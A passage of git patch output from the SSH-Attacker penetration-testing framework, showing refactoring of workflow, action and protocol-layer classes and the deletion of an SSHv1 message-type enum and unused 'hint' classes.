+14,6 @@ import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; import de.rub.nds.sshattacker.core.state.Context; import de.rub.nds.sshattacker.core.state.State; -import de.rub.nds.sshattacker.core.workflow.action.ReceivingAction; import de.rub.nds.sshattacker.core.workflow.action.SshAction; import de.rub.nds.sshattacker.core.workflow.action.executor.WorkflowExecutorType; import java.io.File; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java index 32ac8e56a..dbef926f9 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutor.java @@ -14,7 +14,6 @@ import de.rub.nds.sshattacker.core.layer.LayerStackFactory; import de.rub.nds.sshattacker.core.state.Context; import de.rub.nds.sshattacker.core.state.State; -import de.rub.nds.sshattacker.core.workflow.action.SshAction; import de.rub.nds.sshattacker.core.workflow.action.executor.WorkflowExecutorType; import de.rub.nds.tlsattacker.transport.TransportHandlerFactory; import java.io.IOException; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutorRunnable.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutorRunnable.java index 4a75aa2f0..20787af0a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutorRunnable.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowExecutorRunnable.java @@ -76,12 +76,12 @@ protected void runInternal() { serverCon.setPort(socket.getLocalPort()); ServerTcpTransportHandler th; try { - th = new ServerTcpTransportHandler(connection, socket); + th = new ServerTcpTransportHandler(serverCon, socket); } catch (IOException ex) { LOGGER.error("Could not prepare TransportHandler for {}: {}", socket, ex); LOGGER.error("Aborting workflow trace execution on {}", socket); return; } - context.setTransportHandler(th); + serverCtx.setTransportHandler(th); } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTrace.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTrace.java index 9a2f3dbbe..f3731c863 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTrace.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTrace.java @@ -91,7 +91,7 @@ public static WorkflowTrace copy(WorkflowTrace orig) { @XmlElement( type = SendBleichenbacherOracleReply.class, name = "SendBleichenbacherOracle"), - @XmlElement(type = GenericReceiveAction.class, name = "GenericReceive") + @XmlElement(type = GenericReceiveAction.class, name = "GenericReceive"), @XmlElement( type = DynamicExtensionNegotiationAction.class, name = "DynamicExtensionNegotiation"), diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceNormalizer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceNormalizer.java index 4f8fd1b02..f55a82dc9 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceNormalizer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceNormalizer.java @@ -23,7 +23,7 @@ /** Builds a "normalized" workflow trace. */ public final class WorkflowTraceNormalizer { - private WorkflowTraceNormalizer() { + public WorkflowTraceNormalizer() { super(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java index b3e84e415..2ef9a9b41 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/WorkflowTraceUtil.java @@ -8,14 +8,12 @@ package de.rub.nds.sshattacker.core.workflow; import de.rub.nds.sshattacker.core.constants.MessageIdConstant; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.common.SshMessage; import de.rub.nds.sshattacker.core.workflow.action.ReceivingAction; import de.rub.nds.sshattacker.core.workflow.action.SendingAction; import java.util.LinkedList; import java.util.List; -import java.util.stream.Collectors; public final class WorkflowTraceUtil { @@ -49,20 +47,6 @@ public static List> getAllReceivedMessages( return receivedMessage; } - public static List getAllReceivedPackets(WorkflowTrace trace) { - return getAllReceivedPackets(trace, AbstractPacket.class); - } - - public static List getAllReceivedPackets( - WorkflowTrace trace, Class packetClass) { - //noinspection unchecked - return trace.getReceivingActions().stream() - .flatMap(action -> action.getReceivedPackets().stream()) - .filter(packetClass::isInstance) - .map(packet -> (T) packet) - .collect(Collectors.toUnmodifiableList()); - } - private WorkflowTraceUtil() { super(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicDelayCompressionAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicDelayCompressionAction.java index 47533efbb..77ac01d01 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicDelayCompressionAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicDelayCompressionAction.java @@ -8,9 +8,9 @@ package de.rub.nds.sshattacker.core.workflow.action; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.message.DisconnectMessage; import de.rub.nds.sshattacker.core.protocol.transport.message.NewCompressMessage; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.factory.SshActionFactory; import de.rub.nds.tlsattacker.transport.ConnectionEndType; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicExtensionNegotiationAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicExtensionNegotiationAction.java index 0662ba752..19577972a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicExtensionNegotiationAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicExtensionNegotiationAction.java @@ -8,8 +8,8 @@ package de.rub.nds.sshattacker.core.workflow.action; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.transport.message.ExtensionInfoMessage; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.factory.SshActionFactory; import de.rub.nds.tlsattacker.transport.ConnectionEndType; diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java index 174a824bd..14ee9d21b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/DynamicKeyExchangeAction.java @@ -11,9 +11,7 @@ import de.rub.nds.sshattacker.core.constants.KeyExchangeAlgorithm; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import de.rub.nds.sshattacker.core.state.SshContext; import de.rub.nds.sshattacker.core.state.State; import de.rub.nds.sshattacker.core.workflow.factory.WorkflowConfigurationFactory; import java.util.ArrayList; @@ -21,6 +19,8 @@ import java.util.Objects; import java.util.function.Predicate; import java.util.stream.Collectors; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; public class DynamicKeyExchangeAction extends MessageAction implements ReceivingAction, SendingAction { @@ -58,14 +58,6 @@ public List> getReceivedMessages() { .collect(Collectors.toList()); } - @Override - public List getReceivedPackets() { - return sshActions.stream() - .filter(action -> action instanceof ReceivingAction) - .flatMap(action -> ((ReceivingAction) action).getReceivedPackets().stream()) - .collect(Collectors.toList()); - } - @Override public List> getSendMessages() { return sshActions.stream() diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java index c011fc1a2..4ce9833d0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ForwardMessagesAction.java @@ -290,11 +290,6 @@ public List> getMessages() { return messages; } - @Override - public List getReceivedPackets() { - return receivedPackets; - } - public void setMessages(List> messages) { this.messages = messages; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java index 437f604a6..735289ec3 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceiveAction.java @@ -11,6 +11,7 @@ import de.rub.nds.sshattacker.core.connection.AliasedConnection; import de.rub.nds.sshattacker.core.exceptions.WorkflowExecutionException; import de.rub.nds.sshattacker.core.layer.context.SshContext; +import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.authentication.message.*; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import de.rub.nds.sshattacker.core.protocol.connection.message.*; @@ -195,6 +196,8 @@ public class ReceiveAction extends MessageAction implements ReceivingAction { */ @XmlElement protected Boolean failOnUnexpectedDebugMessages = null; + protected List receivedPackets = new ArrayList<>(); + public ReceiveAction() { super(AliasedConnection.DEFAULT_CONNECTION_ALIAS); } @@ -415,11 +418,6 @@ void setReceivedMessages(List> receivedMessages) { messages = receivedMessages; } - @Override - public List getReceivedPackets() { - return receivedPackets; - } - public void setReceivedPackets(List packetList) { this.receivedPackets = receivedPackets; } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceivingAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceivingAction.java index ba19f5a5b..70f78f1f8 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceivingAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/ReceivingAction.java @@ -7,13 +7,10 @@ */ package de.rub.nds.sshattacker.core.workflow.action; -import de.rub.nds.sshattacker.core.packet.AbstractPacket; import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; import java.util.List; public interface ReceivingAction { - List getReceivedPackets(); - List> getReceivedMessages(); } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java index 96ff36fb6..bcdb19c8c 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/SshAction.java @@ -21,6 +21,8 @@ import jakarta.xml.bind.annotation.XmlTransient; import java.io.Serializable; import java.util.*; +import org.apache.logging.log4j.LogManager; +import org.apache.logging.log4j.Logger; @XmlAccessorType(XmlAccessType.FIELD) public abstract class SshAction implements Serializable, Aliasable { diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/ReceiveMessageHelper.java deleted file mode 100644 index e69de29bb..000000000 diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/action/executor/SendMessageHelper.java deleted file mode 100644 index e69de29bb..000000000 diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java index cce4c7893..b6a86ce0b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/workflow/chooser/DefaultChooser.java @@ -23,6 +23,7 @@ import java.util.List; import java.util.Map; import java.util.Optional; +import java.util.stream.Collectors; import java.util.stream.Stream; import org.apache.logging.log4j.LogManager; import org.apache.logging.log4j.Logger; @@ -543,7 +544,9 @@ public int getServerReserved() { * @return List of client supported extensions */ public List> getClientSupportedExtensions() { - return context.getClientSupportedExtensions().orElse(config.getClientSupportedExtensions()); + return context.getSshContext() + .getClientSupportedExtensions() + .orElse(config.getClientSupportedExtensions()); } /** @@ -554,7 +557,9 @@ public List> getClientSupportedExtensions() { * @return List of server supported extensions */ public List> getServerSupportedExtensions() { - return context.getServerSupportedExtensions().orElse(config.getServerSupportedExtensions()); + return context.getSshContext() + .getServerSupportedExtensions() + .orElse(config.getServerSupportedExtensions()); } /** @@ -566,7 +571,8 @@ public List> getServerSupportedExtensions() { * @return List of server supported public key algorithms for authentication */ public List getServerSupportedPublicKeyAlgorithmsForAuthentication() { - return context.getServerSupportedPublicKeyAlgorithmsForAuthentication() + return context.getSshContext() + .getServerSupportedPublicKeyAlgorithmsForAuthentication() .orElse(config.getServerSupportedPublicKeyAlgorithmsForAuthentication()); } @@ -586,7 +592,7 @@ public List getServerSupportedPublicKeyAlgorithmsForAuthenti // server-sig-algs extension is disabled or no server-sig-algs extension received yet ? // -> use first user key(SSH_RSA) if (!config.getRespectServerSigAlgsExtension() - || !context.getServerSigAlgsExtensionReceivedFromServer()) { + || !context.getSshContext().getServerSigAlgsExtensionReceivedFromServer()) { return config.getUserKeys().get(0); } @@ -602,7 +608,8 @@ public List getServerSupportedPublicKeyAlgorithmsForAuthenti // get server supported public key algorithms // no server-sig-algs extension received? -> SSH_RSA List serverSupportedPublicKeyAlgorithms = - context.getServerSupportedPublicKeyAlgorithmsForAuthentication() + context.getSshContext() + .getServerSupportedPublicKeyAlgorithmsForAuthentication() .orElse(List.of(PublicKeyAlgorithm.SSH_RSA)); // determine common public key algorithm to use for client authentication @@ -633,7 +640,8 @@ public List getServerSupportedPublicKeyAlgorithmsForAuthenti * @return List of client supported compression methods */ public List getClientSupportedDelayCompressionMethods() { - return context.getClientSupportedDelayCompressionMethods() + return context.getSshContext() + .getClientSupportedDelayCompressionMethods() .orElse(config.getClientSupportedDelayCompressionMethods()); } @@ -646,7 +654,8 @@ public List getClientSupportedDelayCompressionMethods() { * @return List of server supported compression methods */ public List getServerSupportedDelayCompressionMethods() { - return context.getServerSupportedDelayCompressionMethods() + return context.getSshContext() + .getServerSupportedDelayCompressionMethods() .orElse(config.getServerSupportedDelayCompressionMethods()); } // endregion diff --git a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParserTest.java b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParserTest.java index 7ca53163c..372f27037 100644 --- a/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParserTest.java +++ b/SSH-Core/src/test/java/de/rub/nds/sshattacker/core/protocol/transport/parser/ExtensionInfoMessageParserTest.java @@ -14,6 +14,7 @@ import de.rub.nds.sshattacker.core.protocol.transport.message.extension.AbstractExtension; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.DelayCompressionExtension; import de.rub.nds.sshattacker.core.protocol.transport.message.extension.ServerSigAlgsExtension; +import java.io.ByteArrayInputStream; import java.util.List; import java.util.stream.Stream; import org.junit.jupiter.params.ParameterizedTest; @@ -103,8 +104,10 @@ public void testParse( String expectedCompressionMethodsClientToServer, int expectedCompressionMethodsServerToClientLength, String expectedCompressionMethodsServerToClient) { - ExtensionInfoMessageParser parser = new ExtensionInfoMessageParser(providedBytes); - ExtensionInfoMessage msg = parser.parse(); + ExtensionInfoMessageParser parser = + new ExtensionInfoMessageParser(new ByteArrayInputStream(providedBytes)); + ExtensionInfoMessage msg = new ExtensionInfoMessage(); + parser.parse(msg); List> extensions = msg.getExtensions(); ServerSigAlgsExtension serverSigAlgsExtension = (ServerSigAlgsExtension) extensions.get(0); DelayCompressionExtension delayCompressionExtension = From 1b9bd6ec1ca68421d76169b7103e9822e24ff2e5 Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sun, 18 Feb 2024 13:17:32 +0100 Subject: [PATCH 137/176] Cleanup Hints because they are not used anymore --- .../constants/ProtocolMessageTypeSSHV1.java | 199 ---------------- .../sshattacker/core/layer/ProtocolLayer.java | 21 +- .../core/layer/hints/LayerProcessingHint.java | 14 -- .../core/layer/hints/PacketLayerHint.java | 61 ----- .../layer/hints/PacketLayerHintSSHV1.java | 93 -------- .../core/layer/impl/PacketLayer.java | 11 +- .../core/layer/impl/SSH1Layer.java | 220 +----------------- .../core/layer/impl/SSH2Layer.java | 114 ++++----- .../sshattacker/core/layer/impl/TcpLayer.java | 11 +- .../core/layer/stream/HintedInputStream.java | 15 +- .../HintedInputStreamAdapterStream.java | 5 +- .../layer/stream/HintedLayerInputStream.java | 9 +- .../core/workflow/WorkflowTraceUtil.java | 155 ++++++++++-- .../core/workflow/action/MessageAction.java | 3 + .../core/workflow/action/ReceiveAction.java | 3 + 15 files changed, 220 insertions(+), 714 deletions(-) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/LayerProcessingHint.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHint.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/hints/PacketLayerHintSSHV1.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java deleted file mode 100644 index 1b8c0f9a1..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/constants/ProtocolMessageTypeSSHV1.java +++ /dev/null @@ -1,199 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.constants; - -import java.util.HashMap; -import java.util.Map; - -public enum ProtocolMessageTypeSSHV1 { - VERSION_EXCHANGE_MESSAGE_SSH1((byte) 0), - ASCII_MESSAGE((byte) 40), - SSH_MSG_DISCONNECT((byte) 1), - SSH_SMSG_PUBLIC_KEY((byte) 2), - SSH_CMSG_SESSION_KEY((byte) 3), - SSH_CMSG_USER((byte) 4), - SSH_CMSG_AUTH_RHOSTS((byte) 5), - SSH_CMSG_AUTH_RSA((byte) 6), - SSH_SMSG_AUTH_RSA_CHALLENGE((byte) 7), - SSH_CMSG_AUTH_RSA_RESPONSE((byte) 8), - SSH_CMSG_AUTH_PASSWORD((byte) 9), - SSH_CMSG_REQUEST_PTY((byte) 10), - SSH_CMSG_WINDOW_SIZE((byte) 11), - SSH_CMSG_EXEC_SHELL((byte) 12), - SSH_CMSG_EXEC_CMD((byte) 13), - SSH_SMSG_SUCCESS((byte) 14), - SSH_SMSG_FAILURE((byte) 15), - SSH_CMSG_STDIN_DATA((byte) 16), - SSH_SMSG_STDOUT_DATA((byte) 17), - SSH_SMSG_STDERR_DATA((byte) 18), - SSH_CMSG_EOF((byte) 19), - SSH_SMSG_EXITSTATUS((byte) 20), - SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 21), - SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 22), - SSH_MSG_CHANNEL_DATA((byte) 23), - SSH_MSG_CHANNEL_CLOSE((byte) 24), - SSH_MSG_CHANNEL_CLOSE_CONFIRMATION((byte) 25), - SSH_SMSG_X11_OPEN((byte) 27), - SSH_CMSG_PORT_FORWARD_REQUEST((byte) 28), - SSH_MSG_PORT_OPEN((byte) 29), - SSH_CMSG_AGENT_REQUEST_FORWARDING((byte) 30), - SSH_SMSG_AGENT_OPEN((byte) 31), - SSH_MSG_IGNORE((byte) 32), - SSH_CMSG_EXIT_CONFIRMATION((byte) 33), - SSH_CMSG_X11_REQUEST_FORWARDING((byte) 34), - SSH_CMSG_AUTH_RHOSTS_RSA((byte) 35), - SSH_MSG_DEBUG((byte) 36), - SSH_CMSG_REQUEST_COMPRESSION((byte) 37); - - /* - // 9 - 19 unassigned (transport layer generic) - SSH_MSG_KEXINIT((byte) 20), - SSH_MSG_NEWKEYS((byte) 21), - // 22 - 29 unassigned (algorithm negotiation) - // 30 - 49 reserved (key exchange method specific) - // [ RFC 4419 ] - SSH_MSG_KEX_DH_GEX_REQUEST_OLD((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_REQUEST((byte) 34, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_GROUP((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_INIT((byte) 32, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - SSH_MSG_KEX_DH_GEX_REPLY((byte) 33, KeyExchangeFlowType.DIFFIE_HELLMAN_GROUP_EXCHANGE), - // [ RFC 4253 ] - SSH_MSG_KEXDH_INIT((byte) 30, KeyExchangeFlowType.DIFFIE_HELLMAN), - SSH_MSG_KEXDH_REPLY((byte) 31, KeyExchangeFlowType.DIFFIE_HELLMAN), - // [ https://datatracker.ietf.org/doc/html/draft-kampanakis-curdle-pq-ssh-00 ] - SSH_MSG_HBR_INIT((byte) 30, KeyExchangeFlowType.HYBRID), - SSH_MSG_HBR_REPLY((byte) 31, KeyExchangeFlowType.HYBRID), - // [ RFC 5656 ] - SSH_MSG_KEX_ECDH_INIT((byte) 30, KeyExchangeFlowType.ECDH), - SSH_MSG_KEX_ECDH_REPLY((byte) 31, KeyExchangeFlowType.ECDH), - SSH_MSG_ECMQV_INIT((byte) 30, KeyExchangeFlowType.ECMQV), - SSH_MSG_ECMQV_REPLY((byte) 31, KeyExchangeFlowType.ECMQV), - // [ RFC 4432 ] - SSH_MSG_KEXRSA_PUBKEY((byte) 30, KeyExchangeFlowType.RSA), - SSH_MSG_KEXRSA_SECRET((byte) 31, KeyExchangeFlowType.RSA), - SSH_MSG_KEXRSA_DONE((byte) 32, KeyExchangeFlowType.RSA), - // [ RFC 4462 ] - // TODO: Add specificTo on GSS messages - SSH_MSG_KEXGSS_INIT((byte) 30), - SSH_MSG_KEXGSS_CONTINUE((byte) 31), - SSH_MSG_KEXGSS_COMPLETE((byte) 32), - SSH_MSG_KEXGSS_HOSTKEY((byte) 33), - SSH_MSG_KEXGSS_ERROR((byte) 34), - SSH_MSG_KEXGSS_GROUPREQ((byte) 40), - SSH_MSG_KEXGSS_GROUP((byte) 41), - // [ RFC 4252 ] - SSH_MSG_USERAUTH_REQUEST((byte) 50), - SSH_MSG_USERAUTH_FAILURE((byte) 51), - SSH_MSG_USERAUTH_SUCCESS((byte) 52), - SSH_MSG_USERAUTH_BANNER((byte) 53), - // 54 - 59 unassigned (user authentication generic) - // 60 - 79 reserved (user authentication method specific) - // [ RFC 4252 ] - SSH_MSG_USERAUTH_PK_OK((byte) 60, AuthenticationMethod.PUBLICKEY), - SSH_MSG_USERAUTH_PASSWD_CHANGEREQ((byte) 60, AuthenticationMethod.PASSWORD), - // [ RFC 4256 ] - SSH_MSG_USERAUTH_INFO_REQUEST((byte) 60, AuthenticationMethod.KEYBOARD_INTERACTIVE), - SSH_MSG_USERAUTH_INFO_RESPONSE((byte) 61, AuthenticationMethod.KEYBOARD_INTERACTIVE), - // [ RFC 4462 ] - SSH_MSG_USERAUTH_GSSAPI_RESPONSE( - (byte) 60, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_TOKEN( - (byte) 61, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_EXCHANGE_COMPLETE( - (byte) 63, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_ERROR( - (byte) 64, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_ERRTOK( - (byte) 65, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - SSH_MSG_USERAUTH_GSSAPI_MIC( - (byte) 66, - new AuthenticationMethod[] { - AuthenticationMethod.GSSAPI, - AuthenticationMethod.GSSAPI_WITH_MIC, - AuthenticationMethod.GSSAPI_KEYEX - }), - // [ RFC 4254 ] - SSH_MSG_GLOBAL_REQUEST((byte) 80), - SSH_MSG_REQUEST_SUCCESS((byte) 81), - SSH_MSG_REQUEST_FAILURE((byte) 82), - // 83 - 89 unassigned (connection protocol generic) - SSH_MSG_CHANNEL_OPEN((byte) 90), - SSH_MSG_CHANNEL_OPEN_CONFIRMATION((byte) 91), - SSH_MSG_CHANNEL_OPEN_FAILURE((byte) 92), - SSH_MSG_CHANNEL_WINDOW_ADJUST((byte) 93), - SSH_MSG_CHANNEL_DATA((byte) 94), - SSH_MSG_CHANNEL_EXTENDED_DATA((byte) 95), - SSH_MSG_CHANNEL_EOF((byte) 96), - SSH_MSG_CHANNEL_CLOSE((byte) 97), - SSH_MSG_CHANNEL_REQUEST((byte) 98), - SSH_MSG_CHANNEL_SUCCESS((byte) 99), - SSH_MSG_CHANNEL_FAILURE((byte) 100), - // 101 - 127 unassigned (channel related messages) - // 128 - 191 reserved (for client protocols) - // 192 - 255 reserved for private use (local extensions) - UNKNOWN((byte) 255); - */ - private byte value; - private final Enum[] specificTo; - - private static final Map MAP; - - private ProtocolMessageTypeSSHV1(byte value) { - this.value = value; - this.specificTo = new Enum[] {}; - } - - private ProtocolMessageTypeSSHV1(byte value, Enum... specificTo) { - this.value = value; - this.specificTo = specificTo; - } - - static { - MAP = new HashMap<>(); - for (ProtocolMessageTypeSSHV1 cm : ProtocolMessageTypeSSHV1.values()) { - MAP.put(cm.value, cm); - } - } - - public static ProtocolMessageTypeSSHV1 getContentType(byte value) { - return MAP.get(value); - } - - public byte getValue() { - return value; - } - - public byte[] getArrayValue() { - return new byte[] {value}; - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java index 80bde11ae..d492f3393 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/ProtocolLayer.java @@ -15,7 +15,6 @@ import de.rub.nds.sshattacker.core.layer.data.Handler; import de.rub.nds.sshattacker.core.layer.data.Parser; import de.rub.nds.sshattacker.core.layer.data.Preparator; -import de.rub.nds.sshattacker.core.layer.hints.LayerProcessingHint; import de.rub.nds.sshattacker.core.layer.stream.HintedInputStream; import java.io.IOException; import java.util.LinkedList; @@ -28,17 +27,15 @@ * itself. It can send messages using the layer below and forward received messages to the layer * above. * - * @param Some layers need a hint which message they should send or receive. * @param The kind of messages/Containers this layer is able to send and receive. */ -public abstract class ProtocolLayer< - HintT extends LayerProcessingHint, ContainerT extends DataContainer> { +public abstract class ProtocolLayer { private static final Logger LOGGER = LogManager.getLogger(); - private ProtocolLayer higherLayer = null; + private ProtocolLayer higherLayer = null; - private ProtocolLayer lowerLayer = null; + private ProtocolLayer lowerLayer = null; private LayerConfiguration layerConfiguration; @@ -147,11 +144,10 @@ protected boolean containerAlreadyUsedByHigherLayer(ContainerT container) { * calling layer) is produced, the data is instead cached in the next inputstream. It may be * that the current input stream is null when this method is called. * - * @param hint This hint from the calling layer specifies which data its wants to read. * @throws IOException Some layers might produce IOExceptions when sending or receiving data * over sockets etc. */ - public abstract void receiveMoreDataForHint(LayerProcessingHint hint) throws IOException; + public abstract void receiveMoreData() throws IOException; /** * Returns a datastream from which currently should be read @@ -162,7 +158,7 @@ protected boolean containerAlreadyUsedByHigherLayer(ContainerT container) { */ public HintedInputStream getDataStream() throws IOException { if (currentInputStream == null) { - receiveMoreDataForHint(null); + receiveMoreData(); if (currentInputStream == null) { throw new EndOfStreamException( "Could not receive data stream 